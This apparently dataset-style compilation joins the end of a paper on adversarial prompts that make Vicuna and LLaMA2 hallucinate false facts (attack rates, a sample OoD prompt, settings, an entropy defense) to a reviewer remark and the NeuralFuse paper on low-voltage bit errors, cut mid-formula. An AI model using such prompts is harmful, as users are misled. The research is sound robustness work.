presidential election in the year 2020. —by Vicuna-7B On the other hand, those prompts have some weak sensible semantics to human beings, some of them even look like spelling errors, which is harmful for LLMs users and is difficult to defend from malicious attacks. | Methods | Vicuna | LLaMA2 | |-----------------------|--------|--------| | Weak Semantic Attack | 92.31% | 53.85% | | OoD Attack | 80.77% | 30.77% | Table 1: The success rate of triggering hallucinations on Vicuna-7B and LLaMA2-7B-chat models with weak semantic and OoD attacks. Table 2: Weak semantic attack towards Vicuna-7B. The red marks out differences between the original and the attacked. Results on OoD attacks. Table 3 records the results of OoD attacks on Vicuna-7B, while the results on LLaMA2-7B-chat could also be found in Appendix A.2. For some meaningless prompts to humans, the Vicuna-7B responds with hallucinations that sound reasonable but mismatch the facts. For example, the final optimized adversarial OoD prompt “Elect doncma: Howard pourvisor American party result South resulted turnoathon” can also elicit the Vicuna-7B to output the same “Donald Trump” hallucination. Further, it is more interesting to find out that OoD prompts are different from weak semantic prompts that they are meaningless and far away from training dataset distribution, but they still induce LLMs generating hallucinations. In other words, we could trigger hallucination beyond training data, which also indicates that hallucination could be a fundamental feature of LLMs beyond training data. And since we may elicit LLMs generating pre-defined behaviors, this could also be disastrous in applications for the criminal may deliver illegal messages with those special OoD prompts. Ablation study on OoD attacks. Table 4 demonstrates the success rate of triggering hallucinations on the LLaMA2-7B-chat model initialized with different lengths of OoD prompts. It can be observed that the longer the initialization length, the higher the success rate of trigger hallucinations. When the length of the OoD prompts increases from 20 to 30, the attack success rate significantly increases by 34.6% (30.77% → 65.38%). Intuitively, if the length of the OoD prompt is long enough, the attack success rate may approach 100%. We will study it in the future works. 4.2 Study on Threshold Defense To avoid hazard adversarial attack in LLMs, we conduct experiments further explore defence method. LLMs are quite different from conventional deep learning models that their training cost and period are much more and longer than the conventional small models. Therefore, direct adversarial training could not be a feasible solution, although it is the most effective so far. We investigate the defense from some basic aspect of LLMs to explore whether there could be other feasible approaches. Entropy threshold defense. We propose a simple threshold defense for hallucination attacks, i.e., employing the entropy of the first token prediction to refuse responding. Fig. 4(a) demonstrates the probability of top-10 tokens in the first generated word in Vicuna-7B. It can be observed that the raw prompt usually generates the first token with low entropy (i.e., the argmax token’s probability is much higher, and the other tokens’ probability is much lower), while the OoD prompt attack and the weak semantic attack have relatively high entropy. Thus, we can set an entropy threshold to defend the hallucination attacks during the inference stage. The results of entropy threshold defense are demonstrated in Fig. 4(b). Where the horizontal axis represents different entropy thresholds, and the vertical axis represents recall (how many prompts will not be refused). It can be observed that when the entropy threshold is set to 1.6, all raw prompts can be answered normally, while 46.1% OoD prompts and 61.5% weak semantic prompts will be refused by the LLMs. Besides, high thresholds will lead to ineffective defense against hallucination attacks, while low thresholds will hurt the performance of the raw prompts. 5 RELATED WORK 5.1 LARGE LANGUAGE MODEL Large Language Model(LLM) [Radford et al., 2019; Chowdhery et al., 2022] is an important category of autoregressive language model with transformers [Vaswani et al., 2017] as the backbone model and pre-trained with next token prediction. The LLMs have demonstrated their promising ability across multiple language tasks. Moreover, this also formulate a new paradigm in the community that large pre-trained generative models contain rich knowledge to adaptive many task even some different modalities (Zhang et al., 2023). However, LLMs also suffer from some disadvantage like hallucination (Manakul et al., 2023; Feldman et al., 2023; Lee, 2023) and safety issue (Wei et al., 2023). Hallucination, LLMs fabricate non-existent facts, current is explained from aspect of training datasets (McKenna et al., 2023; Lightman et al., 2023). Those work argue it is the noisy data or the model overfitting the training data responds for hallucination. However, as another different category of neural network and special pre-training method, the transformer-base LLMs share similar features with conventional neural network models; therefore, LLMs would also respond Out-of-Distribution data with mismatch replies. But there is few work contribute to the direction, and OoD data sometimes could be the trigger of hallucinations. 5.2 Adversarial Attack Adversarial examples are examples with small but intentionally worst-case perturbations making models outputting incorrect results (Goodfellow et al., 2014). It is nightmare of deep learning for adversarial attacks are hard to defense and incorrect outputs. Moreover, (Ilyas et al., 2019) has explained that adversarial examples are fundamental feature of deep neural networks. Similar to last generation of adversarial research, we may construct adversarial prompts to fool the LLMs responding with mismatched replies and non-existent fake facts. On the flip side, the most effective adversarial defense policy (Xiao et al., 2020; Shafahi et al., 2019) for last generation of adversarial competition is adversarial training, however, in era of LLMs, training cost is much more expensive than conventional deep learning models, let alone the adversarial training for LLMs. Therefore, we may avoid illegal adversarial attack from another view that we do not explicitly eliminate them, which is also impossible (Ilyas et al., 2019; Tramer et al., 2020), we may try to implicitly hide them and make the attack more hard (Xiao et al., 2019). 6 Conclusion We conduct extensive experiments revealing that hallucinations could be another view of adversarial examples, it’s more beyond training data. We automatically induce LLMs to respond with non-existent facts via hallucination attack from two distinct directions, i) semantics preserved prompt perturbation, and ii) no-sense OoD prompt; with gradient-base adversarial attack we could construct both two categories of adversarial prompt triggering hallucination. The issue should be constant as long as we train model with current gradient-base optimization method. Furthermore, due to hallucination shares similar features with conventional adversarial examples, we also investigate a simple yet effective way to defense those adversarial prompts without additional adversarial training. In long term run, we believe this novel understanding of hallucination would lead the community rethink how to comprehensively evaluate our LLMs. ETHICS STATEMENT In this paper, we explore how to attack LLMs with adversarial attack methods and induce LLMs within hallucinations. Although, hallucination could lead to potential misdirecting or cheating users, in this work, we believe it’s necessary to evaluate the robustness of LLMs by this way and design defense strategy before their applications. We also wish this direction could help more researches understand safe LLMs and contribute to it. REPRODUCIBILITY STATEMENT We conduct hallucination attack experiment with following hyper-parameters settings, detail in Section[4] and Appendix[A.3] 1. For weak semantic attacks (a) max repeat epochs is 128, and we will stop optimization when trigger hallucination (b) top-k is 256 (c) sample batch size $B$ is 1024 (d) attack target models include Vicuna-7B and LLaMA2-7B-chat 2. For OoD attacks (a) max repeat epochs is 1000, and we will stop optimization when trigger hallucination (b) top-k is 256 (c) sample batch size $B$ is 1024 (d) attack target models include Vicuna-7B and LLaMA2-7B-chat (e) length of prompt, $l$, is 20 REFERENCES Rohan Anil, Andrew M Dai, Orhan Firat, Melvin Johnson, Dmitry Lepikhin, Alexandre Passos, Siamak Shakeri, Emanuel Taropa, Paige Bailey, Zhifeng Chen, et al. Palm 2 technical report. arXiv preprint arXiv:2305.10403, 2023. Yejin Bang, Samuel Cahyawijaya, Nayeon Lee, Wenliang Dai, Dan Su, Bryan Wilie, Holy Lovenia, Ziwei Ji, Tiezhang Yu, Willy Chung, et al. A multitask, multilingual, multimodal evaluation of chatgpt on reasoning, hallucination, and interactivity. arXiv preprint arXiv:2302.04023, 2023. Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. Palm: Scaling language modeling with pathways. arXiv preprint arXiv:2204.02311, 2022. Philip Feldman, James R Foulds, and Shimei Pan. Trapping llm hallucinations using tagged context prompts. arXiv preprint arXiv:2306.06085, 2023. Ian J Goodfellow, Jonathon Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. arXiv preprint arXiv:1412.6572, 2014. Andrew Ilyas, Shibani Santurkar, Dimitris Tsipras, Logan Engstrom, Brandon Tran, and Aleksander Madry. Adversarial examples are not bugs, they are features. Advances in neural information processing systems, 32, 2019. Katherine Lee, Orhan Firat, Ashish Agarwal, Clara Fannjiang, and David Sussillo. Hallucinations in neural machine translation. 2018. Minhyeok Lee. A mathematical investigation of hallucination and creativity in gpt models. Mathematics, 11(10):2320, 2023. Hunter Lightman, Vineet Kosaraju, Yura Burda, Harri Edwards, Bowen Baker, Teddy Lee, Jan Leike, John Schulman, Ilya Sutskever, and Karl Cobbe. Let’s verify step by step. arXiv preprint arXiv:2305.20050, 2023.
Qvoe4wXWFi
* The introduced generator modules may dilute the energy efficiency brought by the low-voltage scheme. Based on Appendix E, the total computations are very large. A more ideal accuracy-saving method should introduce less overhead.
NeuralFuse: Learning to Recover the Accuracy of Access-Limited Neural Network Inference in Low-Voltage Regimes Anonymous authors Paper under double-blind review Abstract Deep neural networks (DNNs) have become ubiquitous in machine learning, but their energy consumption remains a notable issue. Lowering the supply voltage is an effective strategy for reducing energy consumption. However, aggressively scaling down the supply voltage can lead to accuracy degradation due to random bit flips in static random access memory (SRAM) where model parameters are stored. To address this challenge, we introduce NeuralFuse, a novel add-on module that addresses the accuracy-energy tradeoff in low-voltage regimes by learning input transformations to generate error-resistant data representations. NeuralFuse protects DNN accuracy in both nominal and low-voltage scenarios. Moreover, NeuralFuse is easy to implement and can be readily applied to DNNs with limited access, such as non-configurable hardware or remote access to cloud-based APIs. Experimental results demonstrate that, at a 1% bit error rate, NeuralFuse can reduce SRAM memory access energy by up to 24% while recovering accuracy by up to 57%. To the best of our knowledge, this is the first model-agnostic approach (i.e., no model retraining) to address low-voltage-induced bit errors. 1 Introduction Energy-efficient computing is a primary consideration for the deployment of Deep Neural Networks (DNNs), particularly on edge devices and on-chip AI systems. Increasing energy efficiency and lowering the carbon footprint of DNN computation involves iterative efforts from both chip designers and algorithm developers. Processors with specialized hardware accelerators for AI computing are now ubiquitous, capable of providing orders-of-magnitude more performance and energy efficiency for AI computation. In addition to reduced precision/quantization and architectural optimizations, low voltage operation is a powerful knob that impacts power consumption. There is ample evidence in computer engineering literature that study the effects of undervolting and low-voltage operation on accelerator memories that store weights and activations during computation. Aggressively scaling down the SRAM (Static Random Access Memory) supply voltage below the rated value leads to an exponential increase in bit failures, but saves power on account of the quadratic dependence of dynamic power on voltage \cite{Chandramoorthy2019,Ganapathy2017}. Such memory bit flips in the stored weight and activation values can cause catastrophic accuracy loss. A recent spate of works advocates low voltage operation of DNN accelerators using numerous techniques to preserve accuracy ranging from hardware-based error mitigation techniques \cite{Chandramoorthy2019,Keagen2016} to error-aware robust training of DNN models \cite{Kim2018,Koppula2019,Stutz2021}. On-chip error mitigation methods have significant performance and power overheads. On the other hand, some have also proposed to generate models that are more robust to bit errors via a specific learning algorithm \cite{Kim2018,Koppula2019,Stutz2021}, thereby eliminating the need for on-chip error mitigation. However, error-aware training to find the optimal set of robust parameters for each model is time and energy-intensive and may not be possible in all access-limited settings. In this paper, we propose a novel model-agnostic approach: NeuralFuse. NeuralFuse is a machine learning module that allows for mitigating bit errors caused by very low voltage operation, through a trainable input transformation parameterized by a relatively small DNN, to enhance the robustness of... the original input and provide accurate inference. The pipeline of NeuralFuse is illustrated in Figure 1. NeuralFuse accepts the scenarios under access-limited neural networks (e.g., non-configurable hardware or remote access to cloud-based APIs) to protect the deployed models from making wrong predictions under low power. Specifically, we consider two practical access-limited scenarios: (a) Relaxed Access, where the model details are unknown but backpropagation through the black-box models is possible, and (b) Restricted Access, where models are unknown, and backpropagation is disallowed. For relaxed access, we train NeuralFuse via backpropagation, and for restricted access, we train NeuralFuse on a white-box surrogate model and transfer it to the restricted access models. To the best of our knowledge, this is the first study that leverages a learning-based method to address random bit errors for recovering accuracy in low-voltage and access-limited settings. We summarize our main contributions as follows: • We propose NeuralFuse, a novel learning-based input transformation framework to enhance the accuracy of DNNs subject to random bit errors caused by undervolting. NeuralFuse is model-agnostic because it operates in a plug-and-play manner at the data input and it does not require re-training the deployed DNN model. • We consider two practical access-limited scenarios for neural network inference: Relaxed Access and Restricted Access. In the former setting, we use gradient-based methods to train the NeuralFuse module. In the latter setting, we use a white-box surrogate model to train NeuralFuse and show its high transferability to other types of DNN architectures. • We conduct extensive experiments on various combinations of DNN models (ResNet18, ResNet50, VGG11, VGG16, and VGG19), datasets (CIFAR-10, CIFAR-100, GTSRB, and ImageNet-10), and NeuralFuse implementations with different architectures and sizes. The results show that NeuralFuse can consistently increase the perturbed accuracy (accuracy evaluated under random bit errors in weights) by up to 57%, while simultaneously saving the overall SRAM memory access energy by up to 24%, based on the realistic characterization of bit cell failures for a given memory array in a low-voltage regime inducing a 0.5%/1% of bit error rate. • We demonstrate NeuralFuse’s advantages in various scenarios. The experimental results show that NeuralFuse has high transferability (adaptability to unseen base models), versatility (capable of recovering low-precision quantization loss, as well as bit errors), and competitiveness (achieving state-of-the-art performance). 2 RELATED WORK AND BACKGROUND Software-based Energy Saving Strategies. Recent studies have proposed reducing energy consumption from a software perspective. For instance, quantization techniques have been proposed to reduce the precision of storing model weights and decrease total memory storage (Gong et al., 2014; Rastegari et al., 2016; Wu et al., 2016). On the other hand, Yang et al. (2017) proposed energy-aware pruning on each layer and finetunes the weights to maximize the final accuracy. Yang et al. have also proposed several ways to reduce the energy consumption of DNN. For example, they proposed ECC, a DNN compression framework, that compresses a DNN model to meet the given energy constraint (Yang et al., 2019a); they have also proposed to compress DNN models via joint pruning and quantization (Yang et al., 2020). Besides, it is also feasible to treat energy constraint as an optimization problem during DNN training to reduce energy consumption and maximize training accuracy (Yang et al., 2019b). However, these methods focus on changing either the model architectures or model weights to reduce energy consumption, which is orthogonal to our approach with NeuralFuse, which serves as an add-on module for any given model. **Hardware-based Energy Saving Strategies.** Existing works have studied improving energy efficiency by designing specific hardware. Several works have studied the undervolting of DNN accelerators and proposed methods to maintain accuracy in the presence of bit errors. For instance, Reagen et al. (2016) proposed an SRAM fault mitigation technique that rounds the faulty weights into zeros to avoid the degradation of the prediction accuracy. Srinivasan et al. (2016) proposed to store the sensitive MSBs (most significant bits) in robust SRAM cells to preserve accuracy. Chandramoorthy et al. (2019) proposed dynamic supply voltage boosting to a higher voltage to improve the resilience of the memory access operation. On the other hand, Stutz et al. (2021) considered a learning-based approach that tries to find models that are robust to bit errors. The paper discusses several techniques to improve the robustness, such as quantization methods, weight clipping, random bit error training, and adversarial bit error training. The authors observe that the combination of quantization, weight clipping, and adversarial bit error training achieves excellent performance in their experiments. However, they also admitted that the training process for that is sensitive to hyperparameter settings, and hence it might come with a challenging training procedure. We argue that the methods mentioned above are not easy to implement or not suitable for real-world scenarios in *access-limited* settings. For example, the weights of DNN models packed on embedded systems may not be configurable or updatable. Therefore, model retraining (e.g., Stutz et al., 2021) is not a viable option. Moreover, the training of DNNs is already a tedious and time-consuming task. Adding error-aware training during training may further increase the training complexity and introduce challenges in hyperparameter search as identified in previous literature. Özdenizci & Legenstein (2022) also note that this error-aware training was also found ineffective for large DNNs with millions of bits. Our proposed *NeuralFuse* spares the need for model retraining by attaching a trainable input transformation function parameterized by a relatively small DNN as an add-on module to any DNN model as is. **SRAM Bit Errors in DNNs.** Low-voltage-induced memory bit cell failures can cause bit flips from 0 to 1 and vice versa. In practice, SRAM memory bit errors increase exponentially when the supply voltage is scaled below $V_{min}$, which is the minimum voltage required to avoid bit errors. This phenomenon has been well studied in previous literature, such as the work by Chandramoorthy et al. (2019) and Ganapathy et al. (2017). As shown in Figure 2, for an SRAM array of size $512 \times 64$ bits and 14nm technology node, the number of bit errors increases as the voltage scales down. The corresponding dynamic energy per read access of SRAM is shown on the right, measured at each voltage at a constant frequency. In this example, accessing the SRAM at $0.83V_{min}$ leads to a 1% bit error rate, and at the same time, the dynamic energy per access is reduced by approximately 30%. This can lead to inaccurate inferences in DNNs, particularly when bit flips occur at the MSBs. However, improving the robustness to bit errors allows us to lower the voltage and exploit the resulting energy savings. It has been observed that bit cell failures for a given memory array are randomly distributed and independent of each other. That is, the spatial distribution of bit flips could be assumed random, as it is generally different between arrays, even within a chip and between different chips. In this paper, we follow the methodology in [Chandramoorthy et al., 2019] and model bit errors in a memory array of a given size by generating a random distribution of bit errors with equal likelihood of 0-to-1 and 1-to-0 bit flips. Specifically, we assume that the model weights are quantized to 8-bit precision (i.e., from 32-bit floats to 8-bit integers), and randomly distributed bit errors are injected into the quantized 2’s complement representation of weights to generate perturbed models. Please refer to Section 4.1 for more implementation details. 3 NEURALFUSE: FRAMEWORK AND ALGORITHMS 3.1 ERROR-RESISTANT INPUT TRANSFORMATION As illustrated in Figure 1, to overcome the drawback of performance degradation in low-voltage regimes, we propose a novel trainable input transformation module parametrized by a relatively small DNN, NeuralFuse, to mitigate the accuracy-energy trade-off for model inference. The rationale is to use a specially designed loss function and training scheme to derive the NeuralFuse and apply it to the input data such that the transformed inputs will become robust to low-voltage-induced bit errors. Consider the input \( x \) sampled from the data distribution \( X \) and a model \( M_p \) with random bit errors on its weights (which is called a perturbed model). When there are no bit errors (i.e., the normal-voltage settings), the perturbed model reduces to a nominal deterministic model denoted by \( M_0 \). NeuralFuse aims to ensure the perturbed model \( M_p \) can make correct inferences on the transformed inputs as well as retain consistent results of \( M_0 \) in regular (normal-voltage) settings. In order to adapt to different data characteristics, NeuralFuse (\( F \)) is designed to be input-aware, which can be formally defined as: \[ F(x) = \text{clip}_{[-1,1]}(x + G(x)), \] where \( G(x) \) is a “generator” (i.e., an input transformation function) that can generate a perturbation based on the input \( x \). The NeuralFuse transformed data \( F(x) \) will be passed to the deployed model (\( M_0 \) or \( M_p \)) for final inference. Without loss of generality, we assume the transformed input lies within a scaled input range \( F(\cdot) \in [-1, 1]^d \), where \( d \) is the (flattened) dimension of \( x \). 3.2 TRAINING OBJECTIVE AND OPTIMIZER To train the generator \( G(\cdot) \), which should ensure the correctness of both the perturbed model \( M_p \) and the clean model \( M_0 \), we parameterize \( G(\cdot) \) by a neural network and design the following training objective function: \[ \arg \max_{W_G} \log P_{M_0}(y|F(x; W_G)) + \lambda \cdot E_{M_p \sim M_p}[\log P_{M_p}(y|F(x; W_G))], \] where \( W_G \) is the set of trainable parameters for \( G \), \( y \) is the ground-truth label of \( x \), \( P_M \) denotes the likelihood of \( y \) computed by a model \( M \) given a transformed input \( F(x; W_G) \), \( M_p \) is the distribution of the perturbed models inherited from the clean model \( M_0 \) under a \( p\% \) random bit error rate, and \( \lambda \) is a hyperparameter that balances the importance between the nominal and perturbed models. The training objective function can be readily converted to a loss function (\( \text{loss} \)) that evaluates the cross-entropy between the ground-truth label \( y \) and the prediction \( P_M(y|F(x; W_G)) \). That is, the total loss function becomes \[ \text{Loss}_{\text{Total}} = \text{loss}_{M_0} + \lambda \cdot \text{loss}_{M_p}. \] To optimize the loss function entailing the evaluation of the loss term \( \text{loss}_{M_p} \) on randomly perturbed models, our training process is inspired by the EOT (Expectation Over Transformation) attacks [Athalye et al., 2018]. EOT attacks aim to find a robust adversarial example against a variety of image transformations. Based on the idea, we propose a new optimizer for solving equation (3) which we call Expectation Over Perturbed Models (EOPM). EOPM-trained generators can generate error-resistant input transformations and mitigate the inherent bit errors. However, it is computationally impossible to enumerate all possible perturbed models with random bit errors, and the number of realizations for perturbed models is limited by the memory constraint of GPUs used for training. In practice, we only take $N$ perturbed models for each iteration to calculate the empirical average loss, i.e., $$\text{Loss}_N = \frac{\text{loss}_{M_{p_1}} + \ldots + \text{loss}_{M_{p_N}}}{N},$$ where $N$ is the number of simulated perturbed models $\{M_{p_1}, \ldots, M_{p_N}\}$ under random bit errors to calculate the loss. Therefore, the gradient used to update the generator can be calculated as follows: $$\frac{\partial \text{Loss}_{\text{total}}}{\partial W_G} = \frac{\partial \text{loss}_{M_0}}{\partial W_G} + \lambda \cdot \left( \frac{\partial \text{loss}_{M_{p_1}}}{\partial W_G} + \ldots + \frac{\partial \text{loss}_{M_{p_N}}}{\partial W_G} \right).$$ In our implementation, we find that $N = 10$ can already deliver stable performance, and there is little gain in using a larger value. The ablation study for different $N$ can be found in Appendix F. ### 3.3 Training Algorithm Algorithm 1 in Appendix A summarizes the training steps of NeuralFuse. We split the training data $X$ into $B$ mini-batches for training the generator in each epoch. For each mini-batch, we first feed these data into $F(\cdot)$ to get the transformed inputs. Also, we simulate $N$ perturbed models using a $p\%$ random bit error rate, denoted by $M_{p_1}, \ldots, M_{p_N}$, from $M_p$. Then, the transformed inputs are fed into these $N$ perturbed models and the clean model $M_0$ to calculate their losses and gradients. Finally, NeuralFuse parameters $W_G$ are updated based on the gradient obtained by EOPM. ## 4 Experiments In this section, we present the experimental setup and results of NeuralFuse on different datasets and various architectures. In addition, we also provide the visualization results, detailed analysis, and ablation studies to better understand the properties of NeuralFuse. ### 4.1 Experiment Setups **Datasets.** We evaluate NeuralFuse on four different datasets: CIFAR-10 (Krizhevsky & Hinton, 2009), CIFAR-100 (Krizhevsky & Hinton, 2009), GTSRB (Stallkamp et al., 2012), and ImageNet-10 (Deng et al., 2009). CIFAR-10 consists of ten classes, with 50,000 training images and 10,000 for testing. Similarly, CIFAR-100 consists of 100 classes, with 500 training images and 100 testing images in each class. GTSRB (German Traffic Sign Recognition Benchmark) is a dataset that contains 43 classes with 39,209 training images and 12,630 testing images. Similar to CIFAR-10 and CIFAR-100, we resize GTSRB into $32 \times 32 \times 3$ in our experiment. For ImageNet-10, we chose the same ten categories as Huang et al. (2022), and there are 13,000 training images and 500 test images, which are cropped into $224 \times 224 \times 3$. Due to the space limit, the CIFAR-100 results are given in Appendix. **Base Models.** We select several common architectures for our base models: ResNet18, ResNet50 (He et al., 2016), VGG11, VGG16, and VGG19 (Simonyan & Zisserman, 2015). In order to meet the setting of deploying models on a chip, all of our based models are trained by quantization-aware training following Stutz et al. (2021). **NeuralFuse Generators.** The architecture of the NeuralFuse generator ($G$) is based on the Encoder-Decoder structure. We design and compare three types of generators, namely Convolution-based, Deconvolution-based, and UNet-based. For each type, we also consider large(L)/small(S) network sizes. Both Convolution-based and Deconvolution-based variants will follow a similar architecture for ease of comparison. Also, the generators were trained with quantization-aware training. More details are given in Appendix B. - **Convolution-based (Conv):** We use Convolution with MaxPool layers for the encoder, and Convolution with UpSample layers for the decoder. The architecture is inspired by Nguyen & Tran (2020). • **Deconvolution-based (DeConv):** We use Convolution with MaxPool layers for the encoder, and Deconvolution layers for the decoder. • **UNet-based (UNet):** UNet (Ronneberger et al., 2015) is known to attain strong performance on image segmentation. We use Convolution with MaxPool layers for the encoder, and Deconvolution layers for the decoder. **Energy Consumption Calculation.** Chen et al. (2016) has shown that energy consumption in the SRAM part (both buffer and array) consumes a large amount of total system energy consumption. In this paper, we focus on the resilience to low-voltage-induced bit errors in model weights, and our reported energy consumption in Figure 1 is based on the product of the total number of SRAM memory accesses in a systolic-array-based CNN accelerator and the dynamic energy per read access at a given voltage. We assume that there is no bit error on NeuralFuse, as we consider it as an add-on, data preprocessing module that could also be performed by the general-purpose core. Therefore, when implemented in the accelerator, NeuralFuse computation is performed at a higher error-free voltage with a dynamically scaled voltage supply to the memories. We report the reduction in overall weight memory energy consumption (i.e., NeuralFuse + Base Model under $p\%$ bit error rate) with respect to the unprotected base model in the regular voltage mode (i.e., $0\%$ bit error rate and without NeuralFuse). Note that we do not report the overall/end-to-end energy consumption of the accelerator during computation, as end-to-end power savings will depend on various factors, such as the memory power as a fraction of the total hardware power, whether computation logic is also running at low voltage/frequency, or the use of multiple voltage domains in the accelerator. To obtain the number of memory accesses, we used the SCALE-SIM simulator (Samajdar et al., 2020), and our chosen configuration simulates an output-stationary dataflow and a $32 \times 32$ systolic array with 256KB of weight memory. We obtained the dynamic energy per read access of the SRAM at the minimum voltage ($V_{min}$) and at the voltage corresponding to a $1\%$ bit error rate ($V_{ber} \approx 0.83V_{min}$) from Cadence ADE Spectre simulations, both at the same clock frequency. Please refer to Appendix C for more details. **Relaxed and Restricted Access Settings.** We consider two scenarios (relaxed/restricted access) in our experiments. For relaxed access, the information of the base model is not entirely transparent but it allows obtaining gradients from the black-box model through backpropagation. Therefore, this setting allows direct training of NeuralFuse with the base model using EOPM. On the other hand, for restricted access, only the inference function is allowed for the base model. Therefore, we train NeuralFuse by using a white-box surrogate base model and then transfer the generator to the access-restricted model. **Computing Resources.** Our experiments are performed using 8 Nvidia Tesla V100 GPUs, and are implemented with PyTorch. NeuralFuse generally takes 150 epochs to converge, and its training time is similar for the same base model. On both CIFAR-10 and CIFAR-100 datasets, the average training times were 17 hours (ResNet18), 50 hours (ResNet50), 9 hours (VGG11), 13 hours (VGG16), and 15 hours (VGG19). For GTSRB, the average training times were 9 hours (ResNet18), 27 hours (ResNet50), 5 hours (VGG11), 7 hours (VGG16), and 8 hours (VGG19). For ImageNet-10, the average training times were 32 hours (ResNet18), 54 hours (ResNet50), 50 hours (VGG11), 90 hours (VGG16), and 102 hours (VGG19). ### 4.2 Performance Evaluation on Relaxed Access Setting The experimental results of the Relaxed Access setting are shown in Figure 3. We train and test NeuralFuse with various base models (ResNet18, ResNet50, VGG11, VGG16, and VGG19). Two power settings have been considered: nominal voltage (no bit error) and low voltage (random bit errors), and the corresponding bit error rate (B.E.R.) due to low voltage is $1\%$ (CIFAR-10, GTSRB) and $0.5\%$ (ImageNet-10). The B.E.R. of ImageNet-10 is lower because the pre-trained models have more parameters than CIFAR-10 and GTSRB. For each experiment, we sample $N = 10$ perturbed models (independent from training) for evaluation and report the mean and standard deviation of the test accuracy. In the following, clean accuracy (C.A.) means that the model is measured at nominal voltage, and perturbed accuracy (P.A.) means that it is measured at low voltage. For CIFAR-10 and GTSRB, we observe that large generators like ConvL and UNetL can significantly recover the perturbed accuracy in the range of $41\%$ to $63\%$ on ResNet18, VGG11, VGG16, Figure 3: Relaxed Access setting: Test accuracy (%) of different pre-trained models with or without NeuralFuse, compared at nominal voltage (0% bit error rate) or low voltage (with specified bit error rates). The results demonstrate that NeuralFuse consistently recovers perturbation accuracy. and VGG19. For ResNet50, the recover percentage is slightly worse than other base models, but it can attain up to 51% recover percentage on GTSRB. On the other hand, the recover percentage based on small generators like DeConvS are worse than larger generators. This can be explained by the better ability to learn error-resistant generators for larger-sized networks (though they may consume more energy). For ImageNet-10, using larger generators can also gain better performance recovery on perturbed accuracy. This also demonstrates that NeuralFuse can still work well even with large input sizes and is applicable to different datasets. 4.3 Transferability for Restricted Access Setting In the Restricted Access scenario, we train NeuralFuse generators on a white-box surrogate base model and transfer it to other black-box base models. The experimental results are shown in Table 1. We adopt ResNet18 and VGG19 as the white-box surrogate (source) models for training the generators under a 1.5% bit error rate. For the generators, we choose ConvL and UNetL as they obtain better performance in Figure 3. From Table 1, we can find that transferring from a larger B.E.R. like 1.5% can give strong resilience to a smaller B.E.R. like 1% or 0.5%. We also find that using VGG19 as a surrogate model with UNet-based generators like UNetL can give better recovery than other combinations. On the other hand, in some cases, we observe that if we transfer between the same source and target models (but with different B.E.R. for training and testing), the performance may outperform the original relaxed-access results. For instance, when transferring VGG19 with UNetL under a 1.5% B.E.R. to VGG19 or VGG11 under a 0.5% B.E.R., the accuracy is 85.86% v.s. 84.99% for VGG19 (original), and 84.81% v.s. 82.42% for VGG11 (original), respectively. We conjecture that the generators trained on a larger B.E.R. can actually cover the error patterns of a smaller B.E.R., and even help improve generalization under a smaller B.E.R. These findings show great promise for recovering the accuracy of access-limited base models in low-voltage settings. 4.4 Energy-Accuracy Tradeoff We report the total dynamic energy consumption as the total number of SRAM accesses times the dynamic energy of a single SRAM access. Specifically, we used SCALE-SIM to calculate the total weight memory access (T.W.M.A.), which can be found in Table 6 in Appendix D. In Table 2, we Table 1: Restricted Access setting: Transfer results trained with 1.5% bit error rate on CIFAR-10. | S.M. | T.M. | B.E.R. | C.A. (%) | P.A. (%) | ConvL (1.5%) | P.A. (NF) | R.P. | C.A. (NF) | P.A. (NF) | R.P. | |--------|----------|--------|----------|----------|--------------|-----------|-----|-----------|-----------|-----| | | | 1% | 92.6 | 38.9 ± 12.4 | 89.8 | 89.0 ± 0.5 | 50.1 | 85.8 | 85.2 ± 0.5 | 46.3 | | | | 0.5% | 70.1 ± 11.6 | 89.6 ± 0.2 | 19.5 | | | | | | | ResNet18 | | 1% | 92.6 | 26.1 ± 9.4 | 89.2 | 36.1 ± 18 | 10.0 | 84.4 | 38.9 ± 16 | 12.8 | | | | 0.5% | 61.0 ± 10.3 | 74.1 ± 10 | 13.1 | | | | | | | ResNet50 | | 1% | 88.4 | 42.2 ± 11.6 | 86.3 | 59.2 ± 10 | 17.0 | 82.3 | 69.8 ± 7.5 | 27.6 | | | | 0.5% | 63.6 ± 9.3 | 78.9 ± 4.9 | 15.3 | | | | | | | VGG11 | | 1% | 90.3 | 35.7 ± 7.9 | 89.4 | 62.2 ± 18 | 26.5 | 84.7 | 68.9 ± 14 | 33.2 | | | | 0.5% | 66.6 ± 8.1 | 83.4 ± 5.5 | 16.8 | | | | | | | VGG16 | | 1% | 90.5 | 36.0 ± 12.0 | 89.8 | 49.9 ± 23 | 13.9 | 85.0 | 55.1 ± 17 | 19.1 | | | | 0.5% | 64.2 ± 12.4 | 81.8 ± 8.5 | 17.6 | | | | | | | VGG19 | | 1% | 92.6 | 38.9 ± 12.4 | 88.9 | 62.6 ± 13 | 23.7 | 85.0 | 72.3 ± 11 | 33.4 | | | | 0.5% | 70.1 ± 11.6 | 84.2 ± 7.2 | 14.1 | | | | | | | VGG19 | | 1% | 92.6 | 26.1 ± 9.4 | 88.8 | 37.9 ± 18 | 11.8 | 85.2 | 46.7 ± 17 | 20.6 | | | | 0.5% | 61.0 ± 10.3 | 76.6 ± 7.8 | 15.6 | | | | | | | VGG11 | | 1% | 88.4 | 42.2 ± 11.6 | 88.9 | 76.0 ± 6.1 | 33.8 | 85.5 | 81.9 ± 3.9 | 39.7 | | | | 0.5% | 63.6 ± 9.3 | 85.9 ± 2.6 | 22.3 | | | | | | | VGG16 | | 1% | 90.3 | 35.7 ± 7.9 | 89.0 | 76.5 ± 9.0 | 40.8 | 85.9 | 79.2 ± 7.5 | 43.5 | | | | 0.5% | 66.6 ± 8.1 | 87.7 ± 0.7 | 21.1 | | | | | | | VGG19 | | 1% | 90.5 | 36.0 ± 12.0 | 89.1 | 80.2 ± 12 | 44.2 | 86.3 | 84.3 ± 1.2 | 48.3 | | | | 0.5% | 64.2 ± 12.4 | 88.8 ± 0.4 | 24.6 | | | | | | [Note] S.M.: source model, used for training generators. T.M.: target model, used for testing generators. B.E.R.: the bit error rate of the target model. C.A. (%): clean accuracy. P.A. (%): perturbed accuracy. NF: NeuralFuse, and R.P.: total recover percentage of P.A. (NF) v.s. P.A. report the percentage of energy savings at voltages that would yield a 1% bit error rate for various base model and generator combinations. The formula of the energy saving percentage (ES, %) is defined as: \[ ES = 